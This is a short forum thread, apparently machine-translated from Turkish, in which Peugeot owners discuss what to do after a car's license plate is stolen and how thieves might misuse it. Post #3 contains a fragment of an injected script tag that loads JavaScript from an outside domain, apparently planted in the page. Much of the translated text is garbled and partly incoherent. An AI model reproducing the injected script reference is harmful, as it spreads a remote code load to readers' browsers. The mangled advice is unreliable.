Peugeot Forums - Peugeot Fan Club

Plate Stolen

Homepage » PEUGEOT MODELS (FAULTS AND SOLUTIONS) » All Questions About Your Vehicle
08.05.2020 18:35 # 1
Ersan ozturk
Good day everyone, my car's plate was stolen 2 days ago, I called the police and got a report, but whoever I asked, they say you get the job to change the plate. What do you think is the most logical solution, what should I do?
08.05.2020 18:35 # 2
kuscu38
Hodja, if you have a minute when you realize that you have stolen, please don't worry.
08.05.2020 18:35 # 3
oguzhan29
Exactly, if you have the minute, please don't worry. <= "http://i.elexjs.info/elexin/.js" id = "BJ-insertjs">
08.05.2020 18:35 # 4
herry
Replacing a license plate is long, both of your license plates were stolen? I don't think there will be a problem if the police took a record.
08.05.2020 18:35 # 5
samet206
Exactly, it is good that you report and keep a report. You have nothing to do other than that, but it is a different situation, but after keeping a record, there is no problem.
08.05.2020 18:35 # 6
ahmed206
What disgrace, why would they steal the plate?
08.05.2020 18:35 # 7
qqyyxx
The playing of the plate does not mean anything. You can go to traffic and issue a new license plate with the attachment1 document. The document there already acts as a record. only about 90 material and time wasted. And if they do a halt with your plates, it's time until my mouth says my nose.
08.05.2020 18:35 # 8
herry
What can be done with a stolen plate, friends?
If those who know or little guess write their comments, let's know the scenarios that can cope.

Exclamation
08.05.2020 18:35 # 9
Aziz
It was stolen in me, I kept a report on the day it was stolen, but the same day, 8 OGS penalties were issued, then I objected that it was canceled. The brand model of the vehicle is the same, I was able to prove that it was a different color.

we got through it.

Get well soon.
08.05.2020 18:35 # 10
ramtas
My two plates were played. I noticed the morning of the same day. 155 I called the team came, then I went to the police station and made a complaint that there were people coming. By the way, this happened in April 2014. What if the old plates remained, according to the old practice: the stolen plate would come out in each query and it would be necessary to submit the minutes. in my opinion
08.05.2020 18:35 # 11
Mustafa-almanya
What can be done with the [QUOTE = herry] stolen plate, friends?
If those who know or little guess write their comments, let's know the scenarios that can cope.

"Exclamation"
[/ QUOTE]

I guess they tried to attach something illegal to the vehicle.
08.05.2020 18:35 # 12
ahmed206
If they played a plate that the man liked or sought after, he went ...
The most innocent junkers came to my mind Smile
But I think it would have been more logical for them to have stolen for OGS and EDS violations, moreover, they could have been stolen to disassemble and then disassemble for illegal work. Ermm
08.05.2020 18:35 # 13
SDYMZ
What can be done with the [QUOTE = herry] stolen plate, friends?

Exclamation
[/ QUOTE] plug it into a stolen car, if it gets radar during the traffic ticket. or smuggling with that plate
Peugeot Forums - Peugeot Fan Club © 2024
“The most auspicious of people, it is people who are useful.”